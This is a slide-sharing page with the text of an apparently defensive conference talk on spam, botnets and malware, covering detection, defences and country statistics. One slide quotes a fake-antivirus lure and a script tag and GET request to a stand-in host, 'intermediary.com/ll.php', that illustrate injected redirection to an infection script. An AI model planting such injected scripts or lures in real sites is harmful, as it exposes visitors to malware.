Upload
neva
View
38
Download
0
Tags:
Embed Size (px)
DESCRIPTION
SPAM/BOTNETS and Malware. Neil Warner, CIO, GoDaddy.com Moderator: Dan Kaplan, deputy editor, SC Magazine. We Put Up Walls. Modern Day Fort. War Against SPAM. How do you Detect SPAM Mails? Key words Heuristics/Abnormal behavior What can you do to defend against it? SPAM Filters - PowerPoint PPT Presentation
Citation preview
SPAM/BOTNETS and Malware Neil Warner, CIO, GoDaddy.com Moderator: Dan Kaplan, deputy editor, SC Magazine
We Put Up Walls
Modern Day Fort
How do you Detect SPAM Mails?– Key words– Heuristics/Abnormal behavior
What can you do to defend against it?– SPAM Filters– Reputation services to block traffic from those
Spamming IP addresses– Take down the root cause
War Against SPAM
SPAM
US34%
CN16%
RU12%
UK7%
AR7%
BR6%
FR5%
ES5%
RO4%
DE4%
What are Botnets used for? How do we detect them? How can we defend Against it? Botnet lifecycle
– Bot-herder configures initial bot parameters such as infection vectors, payload, stealth, C&C details
– Register a DDNS– Register a static IP– Bot-herder launches or seeds new bot(s)– Bots spread– Causes an increase of DDoS being sent to the victim– Losing bots to rival botnets
Bot Army
Botnets
US53%
RU8%
DE8%
UK7%
FR6%
UA6%
NL5%
CA3%
SE2%
ES2%
Different types of Malware Broad Category
– Trojans, Rootkits, Backdoors Malware for Fun and Profit
– Spyware, Key loggers, Dialers, Bots, Proxies, SEO etc..
Grayware
Camouflaged Attacks
Malware
US45%
CN11%
RU9%
DE8%
NL6%
UA6%
UK4% KR
3% CA3%
CZ3%
Top 10 Malware Countries
Threat Landscape - Brute Force
Threat Landscape - FTP
Threat Landscape - SSH
Threat Landscape - Conficker
Threat Landscape - Slammer
Threat Landscape - Fake Search Agents
Threat Landscape - e107 bot
How Does Malware Happen
$$$$$$
<html>Holy Crap! Infected! Click Here to clean</html>
GET http://intermediary.com/ll.php
Make HTTP calls to infection script and site is infected
Compromised Attack Server(s)
Servers with Compromised Accounts(Zeus/Phishing/etc)
FTP/SSH Upload of Attack Shell/Script
Casual Web User Visits Infected Site
End Users
Fake AV
<script>http://intermediary.com/ll.php</script>
Disposable Domain Name
0 Day vulnerability in a web application or Web Server– Compromises the web sites– Redirects the end user to a malware site or competitors website.– Example: Fake AV Campaign
Fake AV
What Can We Do?
Network/Application Security toolsFirewallsIntrusion Prevention SystemsIntrusion Detection SystemsWeb Application FirewallsNetwork Access ControlsAntivirusReputation based AccessCode Audits
The Most Important Deterent
Security Professionals
Is The Internet Worth IT?
Thank You| Q&A
Neil Warner, CIO [email protected]
https://zeustracker.abuse.ch/ http://www.malwaredomainlist.com/ http://www.phishtank.com/ http://www.clean-mx.de/ http://en.wikipedia.org/wiki/Botnet http://en.wikipedia.org/wiki/Malware
References